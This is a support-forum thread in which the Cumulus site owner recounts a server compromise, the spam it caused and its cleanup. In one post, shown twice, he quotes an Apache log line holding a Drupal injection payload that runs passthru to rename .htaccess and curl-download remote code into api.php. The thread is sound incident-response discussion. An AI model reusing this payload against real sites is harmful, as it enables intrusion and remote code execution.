Welcome to the Cumulus Support forum.
Latest Cumulus MX V4 release 4.0.0 (build 4022) - 11 May 2024
Latest Cumulus MX V3 release 3.28.6 (build 3283) - 21 March 2024
Legacy Cumulus 1 release 1.9.4 (build 1099) - 28 November 2014
(a patch is available for 1.9.4 build 1099 that extends the date range of drop-down menus to 2030)
Download the Software (Cumulus MX / Cumulus 1 and other related items) from the Wiki
Latest Cumulus MX V4 release 4.0.0 (build 4022) - 11 May 2024
Latest Cumulus MX V3 release 3.28.6 (build 3283) - 21 March 2024
Legacy Cumulus 1 release 1.9.4 (build 1099) - 28 November 2014
(a patch is available for 1.9.4 build 1099 that extends the date range of drop-down menus to 2030)
Download the Software (Cumulus MX / Cumulus 1 and other related items) from the Wiki
Site going down.
- ConligWX
- Posts: 1645
- Joined: Mon 19 May 2014 10:45 pm
- Weather Station: Davis vPro2+ w/DFARS + AirLink
- Operating System: Ubuntu 24.04 LTS
- Location: Bangor, NI
- Contact:
Re: Site going down.
Lets hope you've fixed it so you and the wife can get on with the holiday.
Regards Simon
https://www.conligwx.org - @conligwx
Davis Vantage Pro2 Plus with Daytime FARS • WeatherLink Live • Davis AirLink • PurpleAir • CumulusMX v4.0.0
https://www.conligwx.org - @conligwx
Davis Vantage Pro2 Plus with Daytime FARS • WeatherLink Live • Davis AirLink • PurpleAir • CumulusMX v4.0.0
-
- Posts: 512
- Joined: Mon 28 Nov 2011 2:13 am
- Weather Station: Davis VP2/ WLL with DFARS
- Operating System: RPi Raspbian (Buster)
- Location: Ferny Grove, Brisbane, Australia
- Contact:
Re: Site going down.
It's good to hear you have been making progress and thanks for trying to resolve this. It's a horrible shame how low some people are in what they do to cause trouble. Hopefully you have fixed the issue and you do enjoy your holiday.
-
- Posts: 225
- Joined: Sat 27 Aug 2016 12:11 am
- Weather Station: Davis vantage pro 2
- Operating System: Debian
- Location: Wickliffe, Ohio
- Contact:
Re: Site going down.
Any chance that you can give us a little insight on the script they used to keep it running, or what one should look for.
May be helpful for other's to know what to do if they have this problem to stop these script kiddies.
Thanks Steve for your hard work getting this problem resolved while on holiday.
May be helpful for other's to know what to do if they have this problem to stop these script kiddies.
Thanks Steve for your hard work getting this problem resolved while on holiday.
Jeff
My Site http://wickliffeweather.com/
WeatherUnderground https://www.wunderground.com/personal-w ... KOHYOUNG21
My Site http://wickliffeweather.com/
WeatherUnderground https://www.wunderground.com/personal-w ... KOHYOUNG21
- steve
- Cumulus Author
- Posts: 26701
- Joined: Mon 02 Jun 2008 6:49 pm
- Weather Station: None
- Operating System: None
- Location: Vienne, France
- Contact:
Re: Site going down.
I don't really have much to offer, I just deleted installations of things like Wordpress and Drupal which hadn't been kept up to date. This entry (and others similar) in the apache log looked suspicious (thanks go to Ken for suggesting that a suspicious POST was something to look for) and from googling it appeared to be related to a Drupal vulnerability;
85.126.200.23 - - [08/Oct/2018:04:43:19 +0200] "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=mv+sites/default/.htaccess+htaccessx;curl+-o+sites/default/api.php+'http://saint-laurent-gorre.fr/_inc/_phpThumb/demit.aff' HTTP/1.1" 200 8120 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/51.0.2704.79 Chrome/51.0.2704.79 Safari/537.36"
I realised that I had been wrong about the spam not coming from the server when I had turned off all the legitimate sources of email and there were still smtp connections being made. I also had a number of (supposedly) exim processes running, and I don't have exim installed. Some malware disguises itself as exim, amongst other things.
It makes you realise that Linux is no more secure than Windows unless you really know what you're doing and keep on top of vulnerability notices and keep everything up to date. Although I believe this incident was my fault for not keeping things up to date, I do now regret allowing some users to install things like PHPBB and Wordpress.
85.126.200.23 - - [08/Oct/2018:04:43:19 +0200] "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=mv+sites/default/.htaccess+htaccessx;curl+-o+sites/default/api.php+'http://saint-laurent-gorre.fr/_inc/_phpThumb/demit.aff' HTTP/1.1" 200 8120 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/51.0.2704.79 Chrome/51.0.2704.79 Safari/537.36"
I realised that I had been wrong about the spam not coming from the server when I had turned off all the legitimate sources of email and there were still smtp connections being made. I also had a number of (supposedly) exim processes running, and I don't have exim installed. Some malware disguises itself as exim, amongst other things.
It makes you realise that Linux is no more secure than Windows unless you really know what you're doing and keep on top of vulnerability notices and keep everything up to date. Although I believe this incident was my fault for not keeping things up to date, I do now regret allowing some users to install things like PHPBB and Wordpress.
Steve
-
- Posts: 3396
- Joined: Wed 06 May 2009 6:29 pm
- Weather Station: Davis VP2 with Daytime FARS
- Operating System: Windows XP SP3
- Location: Cheadle Hulme, Cheshire, England
- Contact:
Re: Site going down.
Steve, thanks for the update. Way over my head I’m afraid. Does this now mean the malware is no more and the hosting company have removed the threat of closure?
- steve
- Cumulus Author
- Posts: 26701
- Joined: Mon 02 Jun 2008 6:49 pm
- Weather Station: None
- Operating System: None
- Location: Vienne, France
- Contact:
Re: Site going down.
I believe the malware is no more, although there is still a slight oddity to be explained, but this apparently is not doing any harm. Hetzner are going to review after two days. After which I will re-enable the outgoing smtp port so that mail from the forum will start working again, and hopefully the server will eventually stop being flagged as a risk - I’ve noticed in the mail logs that some destinations are refusing mail from us.
Steve
-
- Posts: 3396
- Joined: Wed 06 May 2009 6:29 pm
- Weather Station: Davis VP2 with Daytime FARS
- Operating System: Windows XP SP3
- Location: Cheadle Hulme, Cheshire, England
- Contact:
Re: Site going down.
Thanks Steve. I’m breathing a huge sigh of relief. Things looked very bleak over the weekend but you’ve done a great job in sorting things out aided by Ken.
- ConligWX
- Posts: 1645
- Joined: Mon 19 May 2014 10:45 pm
- Weather Station: Davis vPro2+ w/DFARS + AirLink
- Operating System: Ubuntu 24.04 LTS
- Location: Bangor, NI
- Contact:
Re: Site going down.
It sounds like more a php injection vulnerability than linux itself being hacked. php CMS's are plagued with security holes and by only updating them when updates are released can you try to secure a site.
Steve, on that note you would be advised to update phpBB. your running a version that needs updated
pm sent...
Steve, on that note you would be advised to update phpBB. your running a version that needs updated
pm sent...
Regards Simon
https://www.conligwx.org - @conligwx
Davis Vantage Pro2 Plus with Daytime FARS • WeatherLink Live • Davis AirLink • PurpleAir • CumulusMX v4.0.0
https://www.conligwx.org - @conligwx
Davis Vantage Pro2 Plus with Daytime FARS • WeatherLink Live • Davis AirLink • PurpleAir • CumulusMX v4.0.0
-
- Posts: 3396
- Joined: Wed 06 May 2009 6:29 pm
- Weather Station: Davis VP2 with Daytime FARS
- Operating System: Windows XP SP3
- Location: Cheadle Hulme, Cheshire, England
- Contact:
Re: Site going down.
Not sure if this related or not but when I log into my account with FileZilla it notifies me the certificate has expired. Is that a potential area of concern?
- steve
- Cumulus Author
- Posts: 26701
- Joined: Mon 02 Jun 2008 6:49 pm
- Weather Station: None
- Operating System: None
- Location: Vienne, France
- Contact:
Re: Site going down.
I created a dummy certificate when I enabled secure ftp on the server when testing the code I added to Cumulus MX. Filezilla will try to use secure ftp in preference and will get the dummy certificate. I suppose I should really disable secure ftp on the server, I get asked about this regularly. The last time I was asked, I forgot how it was supposed to work, and broke the server for a short time trying to fix something that didn’t need fixing!
At some point I may look into getting a proper certificate, now that they can be had for free.
(Short answer: no )
At some point I may look into getting a proper certificate, now that they can be had for free.
(Short answer: no )
Steve
-
- Posts: 3396
- Joined: Wed 06 May 2009 6:29 pm
- Weather Station: Davis VP2 with Daytime FARS
- Operating System: Windows XP SP3
- Location: Cheadle Hulme, Cheshire, England
- Contact:
Re: Site going down.
Thanks Steve. Not a major issue for me but given recent events thought it worth asking. I imagine you're feeling a lot better now! Time for a beer or two!
- steve
- Cumulus Author
- Posts: 26701
- Joined: Mon 02 Jun 2008 6:49 pm
- Weather Station: None
- Operating System: None
- Location: Vienne, France
- Contact:
Re: Site going down.
The spam has started again. I have blocked outgoing traffic on port 25 and will investigate when I get home, I've had enough of this for now.
I strongly advise anyone whose web site is on this server to start making alternative arrangements. I will refund any payments made, pro-rata, on request to steve@nybbles.co.uk
I strongly advise anyone whose web site is on this server to start making alternative arrangements. I will refund any payments made, pro-rata, on request to steve@nybbles.co.uk
Steve
- saratogaWX
- Posts: 1211
- Joined: Wed 06 May 2009 5:02 am
- Weather Station: Davis Vantage Pro Plus
- Operating System: Windows 10 Professional
- Location: Saratoga, CA, USA
- Contact:
Re: Site going down.
Ouch. I’ll be glad to analyze the logs again, Steve.
Best regards,
Ken
Best regards,
Ken